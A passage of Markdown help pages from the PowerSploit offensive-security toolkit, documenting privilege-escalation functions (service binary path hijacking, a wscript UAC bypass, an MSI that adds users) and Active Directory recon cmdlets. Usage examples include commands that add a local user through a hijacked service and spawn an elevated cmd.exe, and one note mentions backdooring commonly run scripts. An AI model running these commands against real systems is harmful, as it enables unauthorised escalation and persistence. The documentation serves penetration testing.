[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb) 44 | 45 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-ServiceDetail.md: -------------------------------------------------------------------------------- 1 | # Get-ServiceDetail 2 | 3 | ## SYNOPSIS 4 | Returns detailed information about a specified service by querying the 5 | WMI win32_service class for the specified service name. 6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-ServiceDetail [-Name] 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on 19 | the pipeline object returned by Get-Service, extracts out the service name, queries the 20 | WMI win32_service class for the specified service for details like binPath, and outputs 21 | everything. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-ServiceDetail -Name VulnSVC 28 | ``` 29 | 30 | Gets detailed information about the 'VulnSVC' service. 31 | 32 | ### -------------------------- EXAMPLE 2 -------------------------- 33 | ``` 34 | Get-Service VulnSVC | Get-ServiceDetail 35 | ``` 36 | 37 | Gets detailed information about the 'VulnSVC' service. 38 | 39 | ## PARAMETERS 40 | 41 | ### -Name 42 | An array of one or more service names to query information for. 43 | 44 | ```yaml 45 | Type: String[] 46 | Parameter Sets: (All) 47 | Aliases: ServiceName 48 | 49 | Required: True 50 | Position: 1 51 | Default value: None 52 | Accept pipeline input: True (ByPropertyName, ByValue) 53 | Accept wildcard characters: False 54 | ``` 55 | 56 | ## INPUTS 57 | 58 | ## OUTPUTS 59 | 60 | ### System.Management.ManagementObject 61 | 62 | ## NOTES 63 | 64 | ## RELATED LINKS 65 | 66 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-UnattendedInstallFile.md: -------------------------------------------------------------------------------- 1 | # Get-UnattendedInstallFile 2 | 3 | ## SYNOPSIS 4 | Checks several locations for remaining unattended installation files, 5 | which may have deployment credentials. 6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-UnattendedInstallFile 15 | ``` 16 | 17 | ## DESCRIPTION 18 | {{Fill in the Description}} 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-UnattendedInstallFile 25 | ``` 26 | 27 | Finds any remaining unattended installation files. 28 | 29 | ## PARAMETERS 30 | 31 | ## INPUTS 32 | 33 | ## OUTPUTS 34 | 35 | ### PowerUp.UnattendedInstallFile 36 | 37 | Custom PSObject containing results. 38 | 39 | ## NOTES 40 | 41 | ## RELATED LINKS 42 | 43 | [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) 44 | 45 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-UnquotedService.md: -------------------------------------------------------------------------------- 1 | # Get-UnquotedService 2 | 3 | ## SYNOPSIS 4 | Get-UnquotedService Returns the name and binary path for services with unquoted paths 5 | that also have a space in the name. 6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-UnquotedService 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Uses Get-WmiObject to query all win32_service objects and extract out 19 | the binary pathname for each. 20 | Then checks if any binary paths have a space 21 | and aren't quoted. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-UnquotedService 28 | ``` 29 | 30 | Get a set of potentially exploitable services. 31 | 32 | ## PARAMETERS 33 | 34 | ## INPUTS 35 | 36 | ## OUTPUTS 37 | 38 | ### PowerUp.UnquotedService 39 | 40 | ## NOTES 41 | 42 | ## RELATED LINKS 43 | 44 | [https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb) 45 | 46 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Invoke-PrivescAudit.md: -------------------------------------------------------------------------------- 1 | # Invoke-PrivescAudit 2 | 3 | ## SYNOPSIS 4 | Executes all functions that check for various Windows privilege escalation opportunities. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Invoke-PrivescAudit [-HTMLReport] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Executes all functions that check for various Windows privilege escalation opportunities. 18 | 19 | ## EXAMPLES 20 | 21 | ### -------------------------- EXAMPLE 1 -------------------------- 22 | ``` 23 | Invoke-PrivescAudit 24 | ``` 25 | 26 | Runs all escalation checks and outputs a status report for discovered issues. 27 | 28 | ### -------------------------- EXAMPLE 2 -------------------------- 29 | ``` 30 | Invoke-PrivescAudit -HTMLReport 31 | ``` 32 | 33 | Runs all escalation checks and outputs a status report to SYSTEM.username.html 34 | detailing any discovered issues. 35 | 36 | ## PARAMETERS 37 | 38 | ### -HTMLReport 39 | Switch. 40 | Write a HTML version of the report to SYSTEM.username.html. 41 | 42 | ```yaml 43 | Type: SwitchParameter 44 | Parameter Sets: (All) 45 | Aliases: 46 | 47 | Required: False 48 | Position: Named 49 | Default value: False 50 | Accept pipeline input: False 51 | Accept wildcard characters: False 52 | ``` 53 | 54 | ## INPUTS 55 | 56 | ## OUTPUTS 57 | 58 | ### System.String 59 | 60 | ## NOTES 61 | 62 | ## RELATED LINKS 63 | 64 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Invoke-WScriptUACBypass.md: -------------------------------------------------------------------------------- 1 | # Invoke-WScriptUACBypass 2 | 3 | ## SYNOPSIS 4 | Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe. 5 | 6 | Author: Matt Nelson (@enigma0x3), Will Schroeder (@harmj0y), Vozzie 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Invoke-WScriptUACBypass [-Command] [-WindowStyle ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Drops wscript.exe and a custom manifest into C:\Windows and then proceeds to execute 18 | VBScript using the wscript executable with the new manifest. 19 | The VBScript executed by 20 | C:\Windows\wscript.exe will run elevated. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | " 27 | ``` 28 | 29 | Launches the specified PowerShell encoded command in high-integrity. 30 | 31 | ### -------------------------- EXAMPLE 2 -------------------------- 32 | ``` 33 | Invoke-WScriptUACBypass -Command cmd.exe -WindowStyle 'Visible' 34 | ``` 35 | 36 | Spawns a high integrity cmd.exe. 37 | 38 | ## PARAMETERS 39 | 40 | ### -Command 41 | The shell command you want wscript.exe to run elevated. 42 | 43 | ```yaml 44 | Type: String 45 | Parameter Sets: (All) 46 | Aliases: CMD 47 | 48 | Required: True 49 | Position: 1 50 | Default value: None 51 | Accept pipeline input: True (ByPropertyName, ByValue) 52 | Accept wildcard characters: False 53 | ``` 54 | 55 | ### -WindowStyle 56 | Whether to display or hide the window for the executed '-Command X'. 57 | Accepted values are 'Hidden' and 'Normal'/'Visible. 58 | Default is 'Hidden'. 59 | 60 | ```yaml 61 | Type: String 62 | Parameter Sets: (All) 63 | Aliases: 64 | 65 | Required: False 66 | Position: Named 67 | Default value: Hidden 68 | Accept pipeline input: False 69 | Accept wildcard characters: False 70 | ``` 71 | 72 | ## INPUTS 73 | 74 | ## OUTPUTS 75 | 76 | ## NOTES 77 | 78 | ## RELATED LINKS 79 | 80 | [http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html 81 | https://github.com/Vozzie/uacscript 82 | https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1](http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html 83 | https://github.com/Vozzie/uacscript 84 | https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptBypassUAC.ps1) 85 | 86 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Restore-ServiceBinary.md: -------------------------------------------------------------------------------- 1 | # Restore-ServiceBinary 2 | 3 | ## SYNOPSIS 4 | Restores a service binary backed up by Install-ServiceBinary. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-ServiceDetail, Get-ModifiablePath 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Restore-ServiceBinary [-Name] [[-BackupPath] ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Takes a service Name or a ServiceProcess.ServiceController on the pipeline and 18 | checks for the existence of an "OriginalServiceBinary.exe.bak" in the service 19 | binary location. 20 | If it exists, the backup binary is restored to the original 21 | binary path. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Restore-ServiceBinary -Name VulnSVC 28 | ``` 29 | 30 | Restore the original binary for the service 'VulnSVC'. 31 | 32 | ### -------------------------- EXAMPLE 2 -------------------------- 33 | ``` 34 | Get-Service VulnSVC | Restore-ServiceBinary 35 | ``` 36 | 37 | Restore the original binary for the service 'VulnSVC'. 38 | 39 | ### -------------------------- EXAMPLE 3 -------------------------- 40 | ``` 41 | Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe' 42 | ``` 43 | 44 | Restore the original binary for the service 'VulnSVC' from a custom location. 45 | 46 | ## PARAMETERS 47 | 48 | ### -Name 49 | The service name to restore a binary for. 50 | 51 | ```yaml 52 | Type: String 53 | Parameter Sets: (All) 54 | Aliases: ServiceName 55 | 56 | Required: True 57 | Position: 1 58 | Default value: None 59 | Accept pipeline input: True (ByPropertyName, ByValue) 60 | Accept wildcard characters: False 61 | ``` 62 | 63 | ### -BackupPath 64 | Optional manual path to the backup binary. 65 | 66 | ```yaml 67 | Type: String 68 | Parameter Sets: (All) 69 | Aliases: 70 | 71 | Required: False 72 | Position: 2 73 | Default value: None 74 | Accept pipeline input: False 75 | Accept wildcard characters: False 76 | ``` 77 | 78 | ## INPUTS 79 | 80 | ## OUTPUTS 81 | 82 | ### PowerUp.ServiceBinary.Installed 83 | 84 | ## NOTES 85 | 86 | ## RELATED LINKS 87 | 88 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Set-ServiceBinaryPath.md: -------------------------------------------------------------------------------- 1 | # Set-ServiceBinaryPath 2 | 3 | ## SYNOPSIS 4 | Sets the binary path for a service to a specified value. 5 | 6 | Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Set-ServiceBinaryPath [-Name] [-Path] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Takes a service Name or a ServiceProcess.ServiceController on the pipeline and first opens up a 18 | service handle to the service with ConfigControl access using the GetServiceHandle 19 | Win32 API call. 20 | ChangeServiceConfig is then used to set the binary path (lpBinaryPathName/binPath) 21 | to the string value specified by binPath, and the handle is closed off. 22 | 23 | Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a 24 | Dacl field to each object. 25 | It does this by opening a handle with ReadControl for the 26 | service with using the GetServiceHandle Win32 API call and then uses 27 | QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. 28 | 29 | ## EXAMPLES 30 | 31 | ### -------------------------- EXAMPLE 1 -------------------------- 32 | ``` 33 | Set-ServiceBinaryPath -Name VulnSvc -Path 'net user john Password123! /add' 34 | ``` 35 | 36 | Sets the binary path for 'VulnSvc' to be a command to add a user. 37 | 38 | ### -------------------------- EXAMPLE 2 -------------------------- 39 | ``` 40 | Get-Service VulnSvc | Set-ServiceBinaryPath -Path 'net user john Password123! /add' 41 | ``` 42 | 43 | Sets the binary path for 'VulnSvc' to be a command to add a user. 44 | 45 | ## PARAMETERS 46 | 47 | ### -Name 48 | An array of one or more service names to set the binary path for. 49 | Required. 50 | 51 | ```yaml 52 | Type: String[] 53 | Parameter Sets: (All) 54 | Aliases: ServiceName 55 | 56 | Required: True 57 | Position: 1 58 | Default value: None 59 | Accept pipeline input: True (ByPropertyName, ByValue) 60 | Accept wildcard characters: False 61 | ``` 62 | 63 | ### -Path 64 | The new binary path (lpBinaryPathName) to set for the specified service. 65 | Required. 66 | 67 | ```yaml 68 | Type: String 69 | Parameter Sets: (All) 70 | Aliases: BinaryPath, binPath 71 | 72 | Required: True 73 | Position: 2 74 | Default value: None 75 | Accept pipeline input: False 76 | Accept wildcard characters: False 77 | ``` 78 | 79 | ## INPUTS 80 | 81 | ## OUTPUTS 82 | 83 | ### System.Boolean 84 | 85 | $True if configuration succeeds, $False otherwise. 86 | 87 | ## NOTES 88 | 89 | ## RELATED LINKS 90 | 91 | [https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681987(v=vs.85).aspx) 92 | 93 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Write-UserAddMSI.md: -------------------------------------------------------------------------------- 1 | # Write-UserAddMSI 2 | 3 | ## SYNOPSIS 4 | Writes out a precompiled MSI installer that prompts for a user/group addition. 5 | This function can be used to abuse Get-RegistryAlwaysInstallElevated. 6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Write-UserAddMSI [[-Path] ] 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Writes out a precompiled MSI installer that prompts for a user/group addition. 19 | This function can be used to abuse Get-RegistryAlwaysInstallElevated. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Write-UserAddMSI 26 | ``` 27 | 28 | Writes the user add MSI to the local directory. 29 | 30 | ## PARAMETERS 31 | 32 | ### -Path 33 | {{Fill Path Description}} 34 | 35 | ```yaml 36 | Type: String 37 | Parameter Sets: (All) 38 | Aliases: ServiceName 39 | 40 | Required: False 41 | Position: 1 42 | Default value: UserAdd.msi 43 | Accept pipeline input: True (ByPropertyName, ByValue) 44 | Accept wildcard characters: False 45 | ``` 46 | 47 | ## INPUTS 48 | 49 | ## OUTPUTS 50 | 51 | ### PowerUp.UserAddMSI 52 | 53 | ## NOTES 54 | 55 | ## RELATED LINKS 56 | 57 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-ComputerDetail.md: -------------------------------------------------------------------------------- 1 | # Get-ComputerDetail 2 | 3 | ## SYNOPSIS 4 | This script is used to get useful information from a computer. 5 | 6 | Function: Get-ComputerDetail 7 | Author: Joe Bialek, Twitter: @JosephBialek 8 | Required Dependencies: None 9 | Optional Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-ComputerDetail [-ToString] 15 | ``` 16 | 17 | ## DESCRIPTION 18 | This script is used to get useful information from a computer. 19 | Currently, the script gets the following information: 20 | -Explicit Credential Logons (Event ID 4648) 21 | -Logon events (Event ID 4624) 22 | -AppLocker logs to find what processes are created 23 | -PowerShell logs to find PowerShell scripts which have been executed 24 | -RDP Client Saved Servers, which indicates what servers the user typically RDP's in to 25 | 26 | ## EXAMPLES 27 | 28 | ### -------------------------- EXAMPLE 1 -------------------------- 29 | ``` 30 | Get-ComputerDetail 31 | ``` 32 | 33 | Gets information about the computer and outputs it as PowerShell objects. 34 | 35 | Get-ComputerDetail -ToString 36 | Gets information about the computer and outputs it as raw text. 37 | 38 | ## PARAMETERS 39 | 40 | ### -ToString 41 | Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor. 42 | 43 | ```yaml 44 | Type: SwitchParameter 45 | Parameter Sets: (All) 46 | Aliases: 47 | 48 | Required: False 49 | Position: 1 50 | Default value: False 51 | Accept pipeline input: False 52 | Accept wildcard characters: False 53 | ``` 54 | 55 | ## INPUTS 56 | 57 | ## OUTPUTS 58 | 59 | ## NOTES 60 | This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. 61 | You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files. 62 | 63 | ## RELATED LINKS 64 | 65 | [Blog: http://clymb3r.wordpress.com/ 66 | Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/ 67 | Github repo: https://github.com/clymb3r/PowerShell) 68 | 69 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-Domain.md: -------------------------------------------------------------------------------- 1 | # Get-Domain 2 | 3 | ## SYNOPSIS 4 | Returns the domain object for the current (or specified) domain. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-Domain [[-Domain] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current 18 | domain or the domain specified with -Domain X. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-Domain -Domain testlab.local 25 | ``` 26 | 27 | ### -------------------------- EXAMPLE 2 -------------------------- 28 | ``` 29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 30 | ``` 31 | 32 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 33 | Get-Domain -Credential $Cred 34 | 35 | ## PARAMETERS 36 | 37 | ### -Domain 38 | Specifies the domain name to query for, defaults to the current domain. 39 | 40 | ```yaml 41 | Type: String 42 | Parameter Sets: (All) 43 | Aliases: 44 | 45 | Required: False 46 | Position: 1 47 | Default value: None 48 | Accept pipeline input: True (ByValue) 49 | Accept wildcard characters: False 50 | ``` 51 | 52 | ### -Credential 53 | A \[Management.Automation.PSCredential\] object of alternate credentials 54 | for connection to the target domain. 55 | 56 | ```yaml 57 | Type: PSCredential 58 | Parameter Sets: (All) 59 | Aliases: 60 | 61 | Required: False 62 | Position: Named 63 | Default value: [Management.Automation.PSCredential]::Empty 64 | Accept pipeline input: False 65 | Accept wildcard characters: False 66 | ``` 67 | 68 | ## INPUTS 69 | 70 | ## OUTPUTS 71 | 72 | ### System.DirectoryServices.ActiveDirectory.Domain 73 | 74 | A complex .NET domain object. 75 | 76 | ## NOTES 77 | 78 | ## RELATED LINKS 79 | 80 | [http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG) 81 | 82 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-DomainSID.md: -------------------------------------------------------------------------------- 1 | # Get-DomainSID 2 | 3 | ## SYNOPSIS 4 | Returns the SID for the current domain or the specified domain. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-DomainComputer 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-DomainSID [[-Domain] ] [[-Server] ] [[-Credential] ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns the SID for the current domain or the specified domain by executing 18 | Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192) 19 | to search for domain controllers through LDAP. 20 | The SID of the returned domain controller 21 | is then extracted. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-DomainSID 28 | ``` 29 | 30 | ### -------------------------- EXAMPLE 2 -------------------------- 31 | ``` 32 | Get-DomainSID -Domain testlab.local 33 | ``` 34 | 35 | ### -------------------------- EXAMPLE 3 -------------------------- 36 | ``` 37 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 38 | ``` 39 | 40 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 41 | Get-DomainSID -Credential $Cred 42 | 43 | ## PARAMETERS 44 | 45 | ### -Domain 46 | Specifies the domain to use for the query, defaults to the current domain. 47 | 48 | ```yaml 49 | Type: String 50 | Parameter Sets: (All) 51 | Aliases: 52 | 53 | Required: False 54 | Position: 1 55 | Default value: None 56 | Accept pipeline input: False 57 | Accept wildcard characters: False 58 | ``` 59 | 60 | ### -Server 61 | Specifies an Active Directory server (domain controller) to bind to. 62 | 63 | ```yaml 64 | Type: String 65 | Parameter Sets: (All) 66 | Aliases: DomainController 67 | 68 | Required: False 69 | Position: 2 70 | Default value: None 71 | Accept pipeline input: False 72 | Accept wildcard characters: False 73 | ``` 74 | 75 | ### -Credential 76 | A \[Management.Automation.PSCredential\] object of alternate credentials 77 | for connection to the target domain. 78 | 79 | ```yaml 80 | Type: PSCredential 81 | Parameter Sets: (All) 82 | Aliases: 83 | 84 | Required: False 85 | Position: 3 86 | Default value: [Management.Automation.PSCredential]::Empty 87 | Accept pipeline input: False 88 | Accept wildcard characters: False 89 | ``` 90 | 91 | ## INPUTS 92 | 93 | ## OUTPUTS 94 | 95 | ### String 96 | 97 | A string representing the specified domain SID. 98 | 99 | ## NOTES 100 | 101 | ## RELATED LINKS 102 | 103 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-Forest.md: -------------------------------------------------------------------------------- 1 | # Get-Forest 2 | 3 | ## SYNOPSIS 4 | Returns the forest object for the current (or specified) forest. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: ConvertTo-SID 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-Forest [[-Forest] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current 18 | forest or the forest specified with -Forest X. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-Forest -Forest external.domain 25 | ``` 26 | 27 | ### -------------------------- EXAMPLE 2 -------------------------- 28 | ``` 29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 30 | ``` 31 | 32 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 33 | Get-Forest -Credential $Cred 34 | 35 | ## PARAMETERS 36 | 37 | ### -Forest 38 | The forest name to query for, defaults to the current forest. 39 | 40 | ```yaml 41 | Type: String 42 | Parameter Sets: (All) 43 | Aliases: 44 | 45 | Required: False 46 | Position: 1 47 | Default value: None 48 | Accept pipeline input: True (ByValue) 49 | Accept wildcard characters: False 50 | ``` 51 | 52 | ### -Credential 53 | A \[Management.Automation.PSCredential\] object of alternate credentials 54 | for connection to the target forest. 55 | 56 | ```yaml 57 | Type: PSCredential 58 | Parameter Sets: (All) 59 | Aliases: 60 | 61 | Required: False 62 | Position: Named 63 | Default value: [Management.Automation.PSCredential]::Empty 64 | Accept pipeline input: False 65 | Accept wildcard characters: False 66 | ``` 67 | 68 | ## INPUTS 69 | 70 | ## OUTPUTS 71 | 72 | ### System.Management.Automation.PSCustomObject 73 | 74 | Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition 75 | to the forest root domain SID. 76 | 77 | ## NOTES 78 | 79 | ## RELATED LINKS 80 | 81 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-ForestDomain.md: -------------------------------------------------------------------------------- 1 | # Get-ForestDomain 2 | 3 | ## SYNOPSIS 4 | Return all domains for the current (or specified) forest. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-Forest 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-ForestDomain [[-Forest] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns all domains for the current forest or the forest specified 18 | by -Forest X. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-ForestDomain 25 | ``` 26 | 27 | ### -------------------------- EXAMPLE 2 -------------------------- 28 | ``` 29 | Get-ForestDomain -Forest external.local 30 | ``` 31 | 32 | ### -------------------------- EXAMPLE 3 -------------------------- 33 | ``` 34 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 35 | ``` 36 | 37 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 38 | Get-ForestDomain -Credential $Cred 39 | 40 | ## PARAMETERS 41 | 42 | ### -Forest 43 | Specifies the forest name to query for domains. 44 | 45 | ```yaml 46 | Type: String 47 | Parameter Sets: (All) 48 | Aliases: 49 | 50 | Required: False 51 | Position: 1 52 | Default value: None 53 | Accept pipeline input: True (ByValue) 54 | Accept wildcard characters: False 55 | ``` 56 | 57 | ### -Credential 58 | A \[Management.Automation.PSCredential\] object of alternate credentials 59 | for connection to the target forest. 60 | 61 | ```yaml 62 | Type: PSCredential 63 | Parameter Sets: (All) 64 | Aliases: 65 | 66 | Required: False 67 | Position: Named 68 | Default value: [Management.Automation.PSCredential]::Empty 69 | Accept pipeline input: False 70 | Accept wildcard characters: False 71 | ``` 72 | 73 | ## INPUTS 74 | 75 | ## OUTPUTS 76 | 77 | ### System.DirectoryServices.ActiveDirectory.Domain 78 | 79 | ## NOTES 80 | 81 | ## RELATED LINKS 82 | 83 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-ForestGlobalCatalog.md: -------------------------------------------------------------------------------- 1 | # Get-ForestGlobalCatalog 2 | 3 | ## SYNOPSIS 4 | Return all global catalogs for the current (or specified) forest. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-Forest 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-ForestGlobalCatalog [[-Forest] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns all global catalogs for the current forest or the forest specified 18 | by -Forest X by using Get-Forest to retrieve the specified forest object 19 | and the .FindAllGlobalCatalogs() to enumerate the global catalogs. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-ForestGlobalCatalog 26 | ``` 27 | 28 | ### -------------------------- EXAMPLE 2 -------------------------- 29 | ``` 30 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 31 | ``` 32 | 33 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 34 | Get-ForestGlobalCatalog -Credential $Cred 35 | 36 | ## PARAMETERS 37 | 38 | ### -Forest 39 | Specifies the forest name to query for global catalogs. 40 | 41 | ```yaml 42 | Type: String 43 | Parameter Sets: (All) 44 | Aliases: 45 | 46 | Required: False 47 | Position: 1 48 | Default value: None 49 | Accept pipeline input: True (ByValue) 50 | Accept wildcard characters: False 51 | ``` 52 | 53 | ### -Credential 54 | A \[Management.Automation.PSCredential\] object of alternate credentials 55 | for connection to the target domain. 56 | 57 | ```yaml 58 | Type: PSCredential 59 | Parameter Sets: (All) 60 | Aliases: 61 | 62 | Required: False 63 | Position: Named 64 | Default value: [Management.Automation.PSCredential]::Empty 65 | Accept pipeline input: False 66 | Accept wildcard characters: False 67 | ``` 68 | 69 | ## INPUTS 70 | 71 | ## OUTPUTS 72 | 73 | ### System.DirectoryServices.ActiveDirectory.GlobalCatalog 74 | 75 | ## NOTES 76 | 77 | ## RELATED LINKS 78 | 79 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Get-ForestTrust.md: -------------------------------------------------------------------------------- 1 | # Get-ForestTrust 2 | 3 | ## SYNOPSIS 4 | Return all forest trusts for the current forest or a specified forest. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-Forest 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-ForestTrust [[-Forest] ] [-Credential ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | This function will enumerate domain trust relationships for the current (or a remote) 18 | forest using number of method using the .NET method GetAllTrustRelationships() on a 19 | System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-ForestTrust 26 | ``` 27 | 28 | Return current forest trusts. 29 | 30 | ### -------------------------- EXAMPLE 2 -------------------------- 31 | ``` 32 | Get-ForestTrust -Forest "external.local" 33 | ``` 34 | 35 | Return trusts for the "external.local" forest. 36 | 37 | ### -------------------------- EXAMPLE 3 -------------------------- 38 | ``` 39 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force 40 | ``` 41 | 42 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) 43 | Get-ForestTrust -Forest "external.local" -Credential $Cred 44 | 45 | Return trusts for the "external.local" forest using the specified alternate credenitals. 46 | 47 | ## PARAMETERS 48 | 49 | ### -Forest 50 | Specifies the forest to query for trusts, defaults to the current forest. 51 | 52 | ```yaml 53 | Type: String 54 | Parameter Sets: (All) 55 